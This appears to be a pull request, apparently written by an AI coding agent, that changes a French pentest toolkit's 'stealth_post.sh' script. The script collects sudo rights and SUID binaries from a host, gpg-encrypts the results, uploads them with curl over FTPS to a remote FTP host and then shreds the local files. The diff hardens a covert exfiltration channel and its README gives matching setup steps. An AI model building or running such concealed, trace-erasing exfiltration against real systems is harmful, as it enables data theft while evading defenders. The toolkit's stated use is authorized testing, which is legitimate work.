### PR TITLE
Secure stealth_post exfiltration with GPG and FTPS

### DIFF
--- a/README.md
+++ b/README.md
@@ -93,13 +93,21 @@ bash scripts/linux/pentest_verification.sh
 # Phase d'exploitation (si autorisée)
 bash scripts/linux/pentest_exploitation.sh
 # Génère un fichier de suggestions avec searchsploit si des CVE ont été détectées
-# Exfiltration basique (si autorisée)
+# Exfiltration basique via FTPS (si autorisée)
 export FTP_USER="utilisateur"
 export FTP_PASS="motdepasse"
 export FTP_HOST="exemple.com"
-export FTP_PATH="uploads/sysinfo.txt"
+export FTP_PATH="uploads/sysinfo.txt.gpg"
+export GPG_PASSPHRASE="phrase_secrete"
 bash scripts/linux/stealth_post.sh
 ```
+
+### Configuration de l'hôte distant
+
+- Serveur FTP avec prise en charge de FTPS (TLS explicite).
+- Compte utilisateur autorisé à écrire dans le chemin indiqué par `$FTP_PATH`.
+- Pour récupérer les données, télécharger le fichier chiffré puis le déchiffrer :
+  `gpg --batch --passphrase "phrase_secrete" -o sysinfo.txt -d sysinfo.txt.gpg`.
 
 Chaque exécution de `pentest_discovery.sh` crée un sous-dossier horodaté dans `pentest_results`, conservant les résultats des scans précédents.
 Each run of `pentest_discovery.sh` outputs to a timestamped subfolder inside `pentest_results`, preserving previous scan results.

--- a/scripts/linux/stealth_post.sh
+++ b/scripts/linux/stealth_post.sh
@@ -5,7 +5,8 @@ set -euo pipefail
 #   export FTP_USER="utilisateur"
 #   export FTP_PASS="motdepasse"
 #   export FTP_HOST="exemple.com"
-#   export FTP_PATH="uploads/sysinfo.txt"
+#   export FTP_PATH="uploads/sysinfo.txt.gpg"
+#   export GPG_PASSPHRASE="phrase_secrete"
 #   bash stealth_post.sh
 
 # Read FTP credentials from environment or optional config file
@@ -13,11 +14,12 @@ FTP_USER="${FTP_USER:-}"
 FTP_PASS="${FTP_PASS:-}"
 FTP_HOST="${FTP_HOST:-}"
 FTP_PATH="${FTP_PATH:-}"
+GPG_PASSPHRASE="${GPG_PASSPHRASE:-}"
 # Optional configuration file (~/.stealth_post.conf)
 CONFIG_FILE="${FTP_CONFIG_FILE:-$HOME/.stealth_post.conf}"
 
 # Source config file if variables are empty and file exists
-if [[ -z "$FTP_USER" || -z "$FTP_PASS" || -z "$FTP_HOST" || -z "$FTP_PATH" ]]; then
+if [[ -z "$FTP_USER" || -z "$FTP_PASS" || -z "$FTP_HOST" || -z "$FTP_PATH" || -z "$GPG_PASSPHRASE" ]]; then
     if [[ -f "$CONFIG_FILE" ]]; then
         # shellcheck disable=SC1090
         source "$CONFIG_FILE"
@@ -25,12 +27,13 @@ if [[ -z "$FTP_USER" || -z "$FTP_PASS" || -z "$FTP_HOST" || -z "$FTP_PATH" ]]; t
         FTP_PASS="${FTP_PASS:-}"
         FTP_HOST="${FTP_HOST:-}"
         FTP_PATH="${FTP_PATH:-}"
+        GPG_PASSPHRASE="${GPG_PASSPHRASE:-}"
     fi
 fi
 
 # Error if credentials still unset
-if [[ -z "$FTP_USER" || -z "$FTP_PASS" || -z "$FTP_HOST" || -z "$FTP_PATH" ]]; then
-    echo "❌ Variables FTP_USER, FTP_PASS, FTP_HOST ou FTP_PATH non définies" >&2
+if [[ -z "$FTP_USER" || -z "$FTP_PASS" || -z "$FTP_HOST" || -z "$FTP_PATH" || -z "$GPG_PASSPHRASE" ]]; then
+    echo "❌ Variables FTP_USER, FTP_PASS, FTP_HOST, FTP_PATH ou GPG_PASSPHRASE non définies" >&2
     exit 1
 fi
 
@@ -62,16 +65,28 @@ sudo -l 2>/dev/null | grep -v "may not" >> "$OUT"
 # Binaries SUID
 find / -perm -4000 -type f -exec ls -l {} \; 2>/dev/null | grep -E 'bash|python|perl|find|nmap' >> "$OUT"
 
-# Exfiltration via FTP (modification demandée)
+# Chiffrement du fichier temporaire
+if ! command -v gpg >/dev/null 2>&1; then
+    echo "❌ gpg n'est pas installé" >&2
+    exit 1
+fi
+
+ENC_OUT="$OUT.gpg"
+if ! gpg --batch --yes --passphrase "$GPG_PASSPHRASE" -c "$OUT"; then
+    echo "❌ Échec du chiffrement avec gpg" >&2
+    exit 1
+fi
+
+# Exfiltration via FTPS
 if ! command -v curl >/dev/null 2>&1; then
     echo "❌ curl n'est pas installé" >&2
     exit 1
 fi
 
-if ! curl -s -T "$OUT" "ftp://$FTP_USER:$FTP_PASS@$FTP_HOST/$FTP_PATH" --ftp-create-dirs >/dev/null; then
-    echo "❌ Échec de l'exfiltration via curl" >&2
+if ! curl --ftp-ssl --ssl-reqd -s -T "$ENC_OUT" --user "$FTP_USER:$FTP_PASS" "ftp://$FTP_HOST/$FTP_PATH" --ftp-create-dirs >/dev/null; then
+    echo "❌ Échec de l'exfiltration via curl (FTPS)" >&2
     exit 1
 fi
 
 # Nettoyage
-shred -u "$OUT"
+shred -u "$OUT" "$ENC_OUT"


### PR DESCRIPTION
## Summary
- Encrypt collected data with `gpg` prior to transmission
- Use `curl --ftp-ssl` to transfer encrypted payload via FTPS
- Document FTPS and GPG configuration requirements for the remote host

## Testing
- `bash -n scripts/linux/stealth_post.sh`
- `apt-get update` *(fails: repository not signed)*

------
https://chatgpt.com/codex/tasks/task_e_689dcdfc6c5083328d266d5325e9f851